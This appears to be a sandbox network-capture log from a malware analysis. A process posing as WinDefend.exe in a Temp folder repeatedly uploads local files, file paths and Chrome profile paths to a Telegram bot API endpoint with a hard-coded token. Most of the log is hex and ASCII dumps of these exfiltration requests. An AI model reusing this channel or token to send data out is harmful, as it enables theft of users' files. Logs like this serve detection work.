2024-05-23 13:34:19 UTC	3709	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 3d 00 00 00 4a 08 03 00 00 00 fe 15 73 62 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 03 00 50 4c 54 45 ff ff ff ff ff ff ee e9 e9 df d7 d8 d7 cd ce d3 c8 cb c3 a7 ac b3 9d 9e ab 8d 92 9c 7d 80 92 6e 71 95 64 69 83 52 56 81 4b 4f 7b 43 49 74 41 45 70 30 38 6d 29 30 33 33 33 5d 20 26 5e 1b 20 61 19 20 5a 18 1f 56 17 1c 5c 11 18 59 11 18 4d 11 17 51 10 17 4d 0f 15 49 0f 14 45 0f 15 45 0d 13 41 0a 10 41 0b 10 3a 03 08 d7 cd ce d3 c5 c6 d0 c2 c2 c5 b6 b7 c1 af b1 b6 a3 a5 af 9a 9c 92 6e 71 81 59 5d 82 56 59 74 4a 4c 7d 44 49 7b 43 49 71 3a 40 73 37 3e 71 34 3a 6e 31 36 33 33 33 69 23 29 61 1c 22 60 17 1d 4e 17 1c 59 11 18 4d 13 18 49 0f 14 45 0d 13 41 0d 12 3a 03 08 bf ad af b6 a3 a5 b3 9a 9d af Data Ascii: PNGIHDR=JsbsBITOPLTE}nqdiRVKO{CItAEp08m)0333] &^ a ZV\YMQMIEEAA:nqY]VYtJL}DI{CIq:@s7>q4:n16333i#)a"`NYMIEA:
2024-05-23 13:34:19 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 31 37 66 61 39 66 63 2d 62 35 31 39 2d 34 36 32 33 2d 61 35 61 62 2d 61 64 34 32 30 65 39 39 33 37 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --617fa9fc-b519-4623-a5ab-ad420e993788Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:19 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:19 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 31 37 66 61 39 66 63 2d 62 35 31 39 2d 34 36 32 33 2d 61 35 61 62 2d 61 64 34 32 30 65 39 39 33 37 38 38 2d 2d 0d 0a Data Ascii: --617fa9fc-b519-4623-a5ab-ad420e993788--
2024-05-23 13:34:19 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	61054	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:19 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="6025331e-f70c-4be9-81f7-bc188ef699dd" Host: api.telegram.org Content-Length: 2733 Expect: 100-continue
2024-05-23 13:34:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:19 UTC	40	OUT	Data Raw: 2d 2d 36 30 32 35 33 33 31 65 2d 66 37 30 63 2d 34 62 65 39 2d 38 31 66 37 2d 62 63 31 38 38 65 66 36 39 39 64 64 0d 0a Data Ascii: --6025331e-f70c-4be9-81f7-bc188ef699dd
2024-05-23 13:34:19 UTC	107	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 71 75 61 72 65 74 69 6c 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 71 75 61 72 65 74 69 6c 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=squaretile.png; filename*=utf-8''squaretile.png
2024-05-23 13:34:19 UTC	2401	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 96 08 06 00 00 00 3c 01 71 e2 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 09 03 49 44 41 54 78 da ec 9d 6b 6c 5b e5 19 c7 9f e3 73 7c 89 1d db 49 9d b5 4a db 4c a4 ee 25 68 6d 87 18 23 14 54 3a 60 ed 28 9d e0 43 a1 12 12 12 a8 50 c2 36 d8 da 0d fa a1 88 0f 8c 4d dd a5 48 45 2b 17 09 a9 a3 c0 8a 54 40 c0 50 55 28 a4 02 41 28 37 0d 0a 11 a5 6c 6d 26 9a 06 9a 36 75 62 c7 f1 ed 5c 78 8f fd 1e f7 c4 b1 5b 3b b1 45 7c ce ff 57 bd f2 f1 b1 8f 31 f6 2f ff e7 39 57 0b 9a a6 11 00 d5 c6 81 8f 00 40 2c 00 b1 00 c4 02 00 62 01 88 05 20 16 00 10 0b 40 2c 00 b1 00 80 58 00 62 01 88 05 00 c4 02 10 0b 40 2c 00 20 16 80 58 00 62 01 Data Ascii: PNGIHDR<qtEXtSoftwareAdobe ImageReadyqe<IDATxkl[s\|IJL%hm#T:`(CP6MHE+T@PU(A(7lm&6ub\x[;E\|W1/9W@,b @,Xb@, Xb
2024-05-23 13:34:19 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 30 32 35 33 33 31 65 2d 66 37 30 63 2d 34 62 65 39 2d 38 31 66 37 2d 62 63 31 38 38 65 66 36 39 39 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --6025331e-f70c-4be9-81f7-bc188ef699ddContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:19 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:19 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 30 32 35 33 33 31 65 2d 66 37 30 63 2d 34 62 65 39 2d 38 31 66 37 2d 62 63 31 38 38 65 66 36 39 39 64 64 2d 2d 0d 0a Data Ascii: --6025331e-f70c-4be9-81f7-bc188ef699dd--
2024-05-23 13:34:19 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	61055	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:19 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="2a68e35a-9d40-4e0a-9976-ab68846c28ec" Host: api.telegram.org Content-Length: 468550 Expect: 100-continue
2024-05-23 13:34:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:19 UTC	40	OUT	Data Raw: 2d 2d 32 61 36 38 65 33 35 61 2d 39 64 34 30 2d 34 65 30 61 2d 39 39 37 36 2d 61 62 36 38 38 34 36 63 32 38 65 63 0d 0a Data Ascii: --2a68e35a-9d40-4e0a-9976-ab68846c28ec
2024-05-23 13:34:19 UTC	119	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=PDFSigQFormalRep.pdf; filename*=utf-8''PDFSigQFormalRep.pdf
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 37 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 32 31 31 2f 4f 20 39 2f 45 20 31 37 36 37 2f 4e 20 31 2f 54 20 35 39 32 32 2f 48 20 5b 20 34 34 37 20 31 33 32 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 32 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 34 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 33 45 35 36 44 39 43 30 42 30 45 33 44 31 34 44 38 43 36 39 41 44 46 35 41 37 30 30 42 32 46 44 3e 3c 42 33 44 31 32 31 33 38 46 43 42 34 45 35 34 45 41 39 43 43 45 39 43 39 30 34 30 41 35 41 37 Data Ascii: %PDF-1.6%7 0 obj<</Linearized 1/L 6211/O 9/E 1767/N 1/T 5922/H [ 447 132]>>endobj 12 0 obj<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<3E56D9C0B0E3D14D8C69ADF5A700B2FD><B3D12138FCB4E54EA9CCE9C9040A5A7
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: 35 5b 35 35 36 20 37 37 38 20 35 35 36 20 32 37 38 20 36 36 37 20 35 30 30 20 37 32 32 20 35 30 30 20 37 32 32 20 35 30 30 20 35 35 36 20 35 35 32 20 33 33 33 20 36 36 37 20 35 35 36 20 36 36 37 20 35 35 36 20 37 32 32 20 36 31 35 20 37 32 32 20 36 36 37 20 35 35 36 20 36 36 37 5d 32 36 38 20 32 36 39 20 35 35 36 20 32 37 30 5b 32 32 32 20 35 35 36 20 32 39 32 20 35 35 36 20 33 33 34 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 37 38 20 35 35 36 20 37 32 32 20 33 33 33 20 37 32 32 20 33 33 33 20 36 36 37 20 35 30 30 20 36 31 31 20 32 37 38 20 36 31 31 20 33 37 35 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 36 31 31 20 35 30 30 20 36 31 31 20 35 30 30 20 35 35 31 20 37 37 38 20 37 39 38 20 35 37 38 20 35 35 37 20 34 34 36 20 36 31 37 20 33 Data Ascii: 5[556 778 556 278 667 500 722 500 722 500 556 552 333 667 556 667 556 722 615 722 667 556 667]268 269 556 270[222 556 292 556 334 722 556 722 556 778 556 722 333 722 333 667 500 611 278 611 375 722 556 722 556 611 500 611 500 551 778 798 578 557 446 617 3
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: 32 36 5d 31 33 38 38 20 31 33 38 39 20 35 33 30 20 31 33 39 30 5b 35 36 33 20 35 32 36 5d 31 33 39 32 20 31 33 39 33 20 35 33 30 20 31 33 39 34 5b 35 36 33 20 35 32 36 5d 31 33 39 36 20 31 33 39 37 20 35 33 30 20 31 33 39 38 5b 35 36 33 20 35 32 36 5d 31 34 30 30 20 31 34 30 31 20 35 33 30 20 31 34 30 32 5b 35 36 33 20 35 32 36 5d 31 34 30 34 20 31 34 30 35 20 35 33 30 20 31 34 30 36 20 31 34 32 33 20 33 33 37 20 31 34 32 34 20 31 34 33 39 20 34 38 39 20 31 34 34 30 20 31 34 34 31 20 38 32 31 20 31 34 34 32 20 31 34 34 33 20 35 33 31 20 31 34 34 34 20 31 34 34 35 20 38 32 31 20 31 34 34 36 20 31 34 34 37 20 35 33 31 20 31 34 34 38 20 31 34 34 39 20 38 32 31 20 31 34 35 30 20 31 34 35 31 20 35 33 31 20 31 34 35 32 20 31 34 35 33 20 31 30 39 38 20 31 34 35 Data Ascii: 26]1388 1389 530 1390[563 526]1392 1393 530 1394[563 526]1396 1397 530 1398[563 526]1400 1401 530 1402[563 526]1404 1405 530 1406 1423 337 1424 1439 489 1440 1441 821 1442 1443 531 1444 1445 821 1446 1447 531 1448 1449 821 1450 1451 531 1452 1453 1098 145
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: 20 35 35 36 20 36 36 37 20 35 35 36 20 36 31 31 20 32 37 38 20 37 37 38 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 32 37 38 20 32 32 32 5d 32 34 37 37 20 32 34 37 38 20 32 37 38 20 32 34 37 39 5b 36 36 37 20 35 30 30 20 36 36 37 20 35 30 30 20 36 36 37 20 35 30 30 20 35 35 36 20 32 32 32 20 35 35 36 20 32 32 32 20 35 35 36 20 32 32 32 20 35 35 36 20 32 32 32 5d 32 34 39 33 20 32 34 39 38 20 38 33 33 20 32 34 39 39 5b 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 37 38 20 35 35 36 20 37 37 38 20 35 35 36 20 37 37 38 20 35 35 36 20 37 37 38 20 35 35 36 20 36 36 37 20 35 35 36 20 36 36 37 20 35 35 36 20 37 32 32 20 Data Ascii: 556 667 556 611 278 778 556 722 556 722 556 722 556 722 556 722 556 278 222]2477 2478 278 2479[667 500 667 500 667 500 556 222 556 222 556 222 556 222]2493 2498 833 2499[722 556 722 556 722 556 722 556 778 556 778 556 778 556 778 556 667 556 667 556 722
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: 39 37 20 31 30 33 37 20 38 34 31 20 32 37 38 20 34 33 38 5d 33 34 30 37 20 33 34 30 38 20 31 39 31 20 33 34 30 39 20 33 34 31 30 20 35 30 30 20 33 34 31 31 20 33 34 31 33 20 32 37 38 20 33 34 31 34 5b 33 33 33 5d 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 37 20 30 20 6f 62 6a 0d 3c 3c 2f 4f 72 64 65 72 69 6e 67 28 49 64 65 6e 74 69 74 79 29 2f 52 65 67 69 73 74 72 79 28 41 64 6f 62 65 29 2f 53 75 70 70 6c 65 6d 65 6e 74 20 30 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 38 20 30 20 6f 62 6a 0d 3c 3c 2f 41 73 63 65 6e 74 20 31 30 30 36 2f 43 49 44 53 65 74 20 32 39 20 30 20 52 2f 43 61 70 48 65 69 67 68 74 20 37 31 36 2f 44 65 73 63 65 6e 74 20 2d 33 32 35 2f 46 6c 61 67 73 20 34 2f 46 6f 6e 74 42 42 6f 78 5b 2d 36 36 35 20 2d 33 32 35 20 32 30 30 30 20 31 30 30 36 5d 2f 46 Data Ascii: 97 1037 841 278 438]3407 3408 191 3409 3410 500 3411 3413 278 3414[333...>endobj27 0 obj<</Ordering(Identity)/Registry(Adobe)/Supplement 0>>endobj28 0 obj<</Ascent 1006/CIDSet 29 0 R/CapHeight 716/Descent -325/Flags 4/FontBBox[-665 -325 2000 1006]/F
2024-05-23 13:34:19 UTC	4096	OUT	Data Raw: eb e7 ec 01 6a 90 37 df 7f 44 c5 aa 81 4b 86 d8 1f 20 d3 1d 4e 4c 14 db ee e2 49 f0 36 c3 3a 1e 25 3f 44 1a a2 b8 4e 57 d4 a1 7a b2 85 3c 49 5e 80 55 7a 84 dc 87 ca f0 2b fd 39 b0 4f 01 d8 c3 31 3a 05 68 8f 4d c7 ea 33 d3 c9 2b aa 8b 45 16 8a 6e c7 e2 b0 e3 07 74 3c b7 f2 a1 d9 0c a8 43 49 9c 7c 2a 91 a8 28 0c 56 2e 87 88 d7 d6 d6 54 03 f4 cd 45 11 f2 02 96 47 51 82 97 97 ee 2d 27 c5 15 bf 79 ed 8b df 1d 7e ee 47 af e3 61 f7 9d 8f 26 6f 3f f8 db 53 bf de 1c 38 76 6c 55 6c fb d8 f3 e3 57 77 b4 1f 78 3d e5 3e ff f1 e7 c7 e2 6f 9f 7c b3 67 eb 52 48 44 2f 20 85 0a 23 90 05 76 5c a9 d7 ba e2 ca 4e e5 35 e5 a8 72 56 11 d6 71 eb ec bf e0 39 17 78 02 29 22 27 09 36 99 93 90 02 90 38 c7 f1 05 1c c7 73 76 44 14 3b 2f 71 a3 64 14 59 60 cb e8 d3 6d 88 e7 a1 09 3a 67 Data Ascii: j7DK NLI6:%?DNWz<I^Uz+9O1:hM3+Ent<CI\|*(V.TEGQ-'y~Ga&o?S8vlUlWwx=>o\|gRHD/ #v\N5rVq9x)"'68svD;/qdY`m:g
2024-05-23 13:34:20 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:20 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	61058	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:20 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 188 Expect: 100-continue
2024-05-23 13:34:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:20 UTC	188	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 33 39 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+AddressBook.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CAddressBook.png%0ASize%3A+339+B
2024-05-23 13:34:21 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:20 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	61059	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:20 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 374 Expect: 100-continue
2024-05-23 13:34:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:21 UTC	374	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 Data Ascii: chat_id=1655240967&text=File%3A+topbar_floating_button.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDe
2024-05-23 13:34:21 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:21 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	61060	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:21 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 160 Expect: 100-continue
2024-05-23 13:34:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:21 UTC	160	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 44 6f 63 54 65 6d 70 6c 61 74 65 73 25 35 43 45 4e 55 25 35 43 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 31 35 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+template1.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CDocTemplates%5CENU%5Ctemplate1.pdf%0ASize%3A+15+KB
2024-05-23 13:34:21 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:21 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	61061	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:21 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="af669190-cc5a-412b-a104-c83d4e004a47" Host: api.telegram.org Content-Length: 673 Expect: 100-continue
2024-05-23 13:34:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:22 UTC	40	OUT	Data Raw: 2d 2d 61 66 36 36 39 31 39 30 2d 63 63 35 61 2d 34 31 32 62 2d 61 31 30 34 2d 63 38 33 64 34 65 30 30 34 61 34 37 0d 0a Data Ascii: --af669190-cc5a-412b-a104-c83d4e004a47
2024-05-23 13:34:22 UTC	109	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 41 64 64 72 65 73 73 42 6f 6f 6b 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=AddressBook.png; filename*=utf-8''AddressBook.png
2024-05-23 13:34:22 UTC	339	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 12 08 06 00 00 00 56 ce 8e 57 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 0d 49 44 41 54 38 11 63 60 a0 12 60 84 99 53 50 50 f0 03 c8 66 9f 30 61 02 23 90 fd 1f 26 4e 80 7e c2 cc cc 9c d6 db db bb 9d 09 49 21 3b 12 9b 58 a6 cc df bf 7f 67 81 14 23 1b 44 ac 66 74 75 32 a4 1a f4 1b a8 01 84 b1 02 a2 5c c4 c8 c8 f8 98 83 83 43 9c 9d 9d 5d 14 68 ca 6d 6c 26 11 65 10 50 e3 d6 8e 8e 8e f7 9d 9d 9d 1f 81 86 6e 20 db a0 ff ff ff 73 c0 34 03 d9 3c 30 36 32 cd 82 cc c1 c5 06 ba 22 b8 aa aa aa e2 cf 9f 3f cc bf 7e fd 8a c6 a6 8e a0 d7 80 86 fc 03 6a 3c 00 34 84 95 89 89 89 0d c8 3e 0a c4 18 e9 